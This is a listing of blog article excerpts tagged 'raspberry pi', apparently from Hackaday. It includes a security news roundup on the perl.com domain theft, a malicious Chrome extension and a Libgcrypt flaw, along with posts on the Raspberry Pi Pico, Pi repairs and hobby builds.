raspberry pi

1668 Articles

This Week In Security: Perl.com, The Great Suspender, And Google’s Solution

February 5, 2021 by 46 Comments

Perl has been stolen. Well, perl.com, at least. The perl.com domain was transferred to a different registrar on January 27, without the permission of the rightful owner. The first to notice the hack seems to have been [xtaran], who raised the alarm on a Reddit thread. The proper people quickly noticed, and started the process of getting control of the domain again. It seems that several other unrelated domains were also stolen in the same attack.

I’ve seen a couple of theories tossed around about how the domains were stolen. With multiple domains being moved, it initially seemed that the registrar had been compromised in some way. One of the other victims was told that a set of official looking documents had been supplied, “proving” that the attacker was the rightful owner of the domain. In any case, the damage is slowly being unwound. Perl.com is once again in the proper hands, evidenced by the proper SSL certificate issued back in December.

The Great Suspender, Suspended

I was greeted by a particularly nasty surprise on Thursday of this week. One of the Chrome extensions I’ve come to rely on was removed by Google for containing malware. The Great Suspender automatically hibernates unused tabs, saving ram and processor cycles that would otherwise be spent on those 150 open tabs that should really be bookmarks. What happened here?

I’ll point out that I’m extremely careful about installing extensions. It’s code written by a third party, often very difficult to inspect, and can view and modify the sites you visit. You can manage what sites an extension has access to, but for a tool like the Suspender, it essentially needs access to all of them. The solution is to use open source extensions, right? “Well yes, but actually no.” Suspender is open source, after all. The link above goes to the project’s Github page. In that repo you’ll find an announcement from last year, that the founding developer is finished with the project, and is selling the rights to an unknown third party, who took over maintainership. If this sounds familiar, there are echoes of the event-stream debacle.

It’s not clear exactly what malicious behavior Google found that led to the extension being pulled, but a more careful look at the project reveals that there were potential problems as early as October of 2020. An addition to the extension introduced execution of code from a remote server, never a good idea. For what it’s worth, the original maintainer has made a statement, defending the new owners, and suggesting that this was all an innocent mistake.

The lesson here? It’s not enough to confirm that an extension checks the “open source” box. Make sure there is an active community, and that there isn’t a 6 month old bug report detailing potentially malicious activity.

Libgcrypt

It’s not everyday you see a developer sending out a notice that everyone should stop using his latest release. That’s exactly what happened with Libgcrypt 1.9.0. Our friends over at Google’s Project Zero discovered an extremely nasty vulnerability in the code. It’s a buffer overflow that happens during the decryption process, before even signature verification. Since libgcrypt is used in many PGP implementations, the ramifications could be nasty. Receive an encrypted email, and as soon as your client decrypts it, code is executing. Thankfully, an update that fixes the issue has already been released.

Android Botnet

A new botnet is targeting Android devices in a peculiar way — looking for open ADB debug ports exposed to the Internet. Google makes it very clear that ADB over the network is insecure, and should only be used for development purposes, and on controlled networks. It’s astounding that so many vendors ship hardware with this service exposed. Beyond that, it’s surprising that so many people give their Android devices public IP addresses (or IPv6 addresses that aren’t behind a firewall). The botnet, named Matryosh, has another unique feature, as it uses Tor for command and control functions, making it harder to track.

Google Solution to Open-Source Security

Google published a post on their open source blog, giving an overview for their new framework for the security of open source projects. “Know, Prevent, Fix” is their name for the new effort, and it must have been written by management, because it’s full of buzzwords. The most interesting elements are their goals for critical software. They identify problems like the ability of a single maintainer to push bad code into a project, and how anonymous maintainers is probably a bad idea. It will be interesting to see how these ideas develop, and how Google will help open source communities implement them.

Microsoft in My Pi

And finally, I was amused by an article lamenting the inclusion of the VSCode repository in the default Raspberry Pi OS images. He does raise a couple legitimate points. Amont them, you do send a ping to Microsoft’s servers every time you check for new updates.

The larger point is that the official VSCode binaries have telemetry code added to them — code that isn’t in the open source repository. What is it doing? You don’t know. But it probably violates European law.

Want to use VSCode, but not interested in shipping info off to Microsoft? VSCodium is a thing.

All The Best Computers From Cambridge Boot To Basic

February 1, 2021 by 77 Comments

The Raspberry Pi is a fine machine that appears in many a retrocomputing project, but its custom Linux distribution lacks one thing. It boots into a GNU/Linux shell or a fully-featured desktop GUI rather than as proper computers should, to a BASIC interpreter. This vexed [Alan Pope], who yearned for his early days of ROM BASIC, so he set out to create a Raspberry Pi 400 that delivers the user straight to BASIC. What follows goes well beyond the Pi, as he takes something of a “State of the BASIC” look at the various available interpreters for the simple-to-code language. Almost every major flavour you could imagine has an interpreter, but as is a appropriate for a computer from Cambridge running an ARM processor, he opts for one that delivers BBC BASIC.

It would certainly be possible to write a bare-metal image that took the user straight to a native ARM BASIC interpreter, but instead he opts for the safer route of running the interpreter on top of a minimalist Linux image. Here he takes the unexpected step of using an Ubuntu distribution rather than Raspberry Pi OS, this is done through familiarity with its quirks. Eventually he settled upon a BBC BASIC interpreter that allowed him to do all the graphical tricks via the SDL library without a hint of X or a compositor, meaning that at last he had a Pi that boots to BASIC. Assuming that it’s an interpreter rather than an emulator it should be significantly faster than the original, but he doesn’t share that information with us.

This isn’t the first boot-to-BASIC machine we’ve shown you.

Header image:  A real BBC Micro BASIC prompt. Thanks [Claire Osborne] for the picture.

Repairing 200+ Raspberry Pis For A Good Cause

January 25, 2021 by 37 Comments

If somebody told you they recently purchased over 200 Raspberry Pis, you might think they were working on some kind of large-scale clustering project. But in this case, [James Dawson] purchased the collection of broken single-board computers with the intention of repairing them so they could be sent to developing countries for use in schools. It sounds like the logistics of that are proving to be a bit tricky, but we’re happy to report he’s at least made good progress on getting the Pis back up and running.

He secured this trove of what he believes to be customer returned Raspberries or the princely sum of £61 ($83 USD). At that price, even if only a fraction ended up being repairable, you’d still come out ahead. Granted all of these appear to be the original Model B, but that’s still a phenomenal deal in our book. Assuming of course you can find some reasonable way to triage them to sort out what’s worth keeping.

To that end, [James] came up with a Bash script that allowed him to check several hardware components including the USB, Ethernet, I2C, and GPIO. With the script on an SD card and a 3.5″ TFT plugged into the Pi’s header for output, he was able to quickly go through the box to get an idea of what sort of trouble he’d gotten himself into. He was only about half way through the process when he wrote this particular blog post, but by that point, he’d found just 40 Pis which wouldn’t start at all. He suspects these might be victims of some common issue in the power circuitry that he’ll investigate at a later date.

A metal ruler made short work of bent pins.
A nasty, but repairable, problem.

The majority of Pis he checked were suffering from nothing worse than some bent GPIO pins or broken SD card slots. Some of the more abused examples had their USB ports ripped off entirely, but were otherwise fine. Another 10 had dead Ethernet, and 4 appear to have damaged traces leading to their HDMI ports. While we’re interested in hearing if [James] can get those 40 dark Pis to fire back up, so far the results are quite promising.

Donating hardware is always a tricky thing, so for now [James] says he’ll be selling the repaired Pis on eBay and donating the proceeds to the Raspberry Pi Foundation so they can continue to develop hardware that will (potentially) accomplish their goal of giving students all over the world a functional computer.

New Parts, New Hacks

January 23, 2021 by 84 Comments

The biggest news this week is that Raspberry Pi is no longer synonymous with single-board Linux computers: they’re dipping their toes into the microcontroller business with their first chip: the RP2040, and the supporting breakout board, the Pico. It’s an affordable, capable microcontroller being made by a firm that’s never made microcontrollers before, so that’s newsy.

The Hackaday comments lit on fire about this chip, with some fraction of the commenters lamenting the lack of wireless radios onboard. It’s a glass-half-full thing, I guess, but the RP2040 isn’t an ESP32, folks. It’s something else. And it’s got a hardware trick up its sleeve that really tickles my fancy — the programmable input/output (PIO) units.

The other half of the commenters were, like me, salivating about getting to try out some of the new features. The PIO, of course, was high on that list, but this chip also caters to folks who are doing high-speed DSP, with fast multiplication routines burnt into ROM and a nice accumulator. (You know you’re a microcontroller nerd when you’re reading through a 663-page datasheet and thinking about all the funny ways you can use and/or abuse the hardware peripherals.)

All chip designs are compromises. Nothing can do everything. The new peripherals, novel combinations of old elements, and just pleasant design decisions, open up new opportunities if you’re willing to seek them out. When the ESP32 was new, I was looking at their oddball parallel-I2S hardware and thinking what kind of crazy hacks that would enable, and clever hackers have proven me right. I’d put my money on the PIO being similar.

New chips open up new possibilities for hacks. What are you going to do with them?

This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!

Raspberry Pi Enters Microcontroller Game With $4 Pico

January 20, 2021 by 351 Comments

Raspberry Pi was synonymous with single-board Linux computers. No longer. The $4 Raspberry Pi Pico board is their attempt to break into the crowded microcontroller module market.

The microcontroller in question, the RP2040, is also Raspberry Pi’s first foray into custom silicon, and it’s got a dual-core Cortex M0+ with luxurious amounts of SRAM and some very interesting custom I/O peripheral hardware that will likely mean that you never have to bit-bang again. But a bare microcontroller is no fun without a dev board, and the Raspberry Pi Pico adds 2 MB of flash, USB connectivity, and nice power management.

As with the Raspberry Pi Linux machines, the emphasis is on getting you up and running quickly, and there is copious documentation: from “Getting Started” type guides for both the C/C++ and MicroPython SDKs with code examples, to serious datasheets for the Pico and the RP2040 itself, to hardware design notes and KiCAD breakout boards, and even the contents of the on-board Boot ROM. The Pico seems designed to make a friendly introduction to microcontrollers using MicroPython, but there’s enough guidance available for you to go as deep down the rabbit hole as you’d like.

Our quick take: the RP2040 is a very well thought-out microcontroller, with myriad nice design touches throughout, enough power to get most jobs done, and an innovative and very hacker-friendly software-defined hardware I/O peripheral. It’s backed by good documentation and many working examples, and at the end of the day it runs a pair of familiar ARM MO+ CPU cores. If this hits the shelves at the proposed $4 price, we can see it becoming the go-to board for many projects that don’t require wireless connectivity.

But you want more detail, right? Read on.

Continue reading “Raspberry Pi Enters Microcontroller Game With $4 Pico”

Solid Oak Arcade Cabinet: When Particle Board Won’t Do

January 8, 2021 by 25 Comments

Having an arcade cabinet of one’s own is a common dream among those who grew up during the video game arcade heyday of the 80s and early 90s. It’s a fairly common build that doesn’t take too much specialized knowledge to build. This cabinet, on the other hand, pulled out all of the stops for the cabinet itself, demonstrating an impressive level of woodworking expertise.

The cabinet enclosure is made with red oak boards, which the creator [Obstreperuss] sawed and planed and then glued together to create the various panels (more details are available on his Imgur album). The Mario artwork on the sides and front aren’t just vinyl stickers, either. He used various hardwoods cut into small squares to create pixel art inlays in the oak faces. After the fancy woodwork was completed, the build was finished out with some USB arcade controllers, a flat-panel screen, and a Raspberry Pi to run the games.

While the internals are pretty standard, we have to commend the incredible quality of the woodworking. It’s an impressive homage to classic arcade machines and we wouldn’t mind a similar one in our own homes. If you’re lacking the woodworking equipment, though, it’s possible to get a refined (yet smaller) arcade cabinet for yourself with a 3D printer instead.

Continue reading “Solid Oak Arcade Cabinet: When Particle Board Won’t Do”

A Tubular Fairy Tale You Control With Your Phone

January 6, 2021 by 1 Comment

At first glance, this might appear to be a Rube Goldberg machine made of toys. The truth isn’t far off — it’s a remote-control animatronic story machine driven by its spectators and their phones. [Niklas Roy] and a team of volunteers built it in just two weeks for Phaenomenale, a festival centered around art and digital culture that takes place every other year.

A view of the tubes without the toys.

A red ball travels through a network of clear acrylic tubes using 3D printed Venturi air movers, gravity, and toys to help it travel. Spectators can change the ball’s path with their phones via a local website with a big picture of the installation. The ball triggers animations along its path using break beam detection and weaves a different story each time depending on the toys it interacts with.

Here’s how it works: a Raspberry Pi 4 is responsible for releasing the ball at the beginning of the track and for controlling the track switches. The Pi also hosts a server for smartphones and the 25 Arduino Nanos that control the LEDs and servos of the animatronics. As a bonus animatronic, there’s a giant whiteboard that rotates and switches between displaying the kids’ drawings and the team’s plans and schematics. Take a brief but up-close tour after the break.

This awesome art project was a huge collaborative effort that involved the people of Wolfsburg, Germany — families in the community donated their used and abandoned toys, groups of elementary school kids were brought in to create stories for the toys, and several high school kids and other collaborators realized these drawings with animatronics.

Toys can teach valuable lessons, too. Take this body-positive sushi-snarfing Barbie for example, or this dollhouse of horrors designed to burn fire safety into children’s brains.

Continue reading “A Tubular Fairy Tale You Control With Your Phone”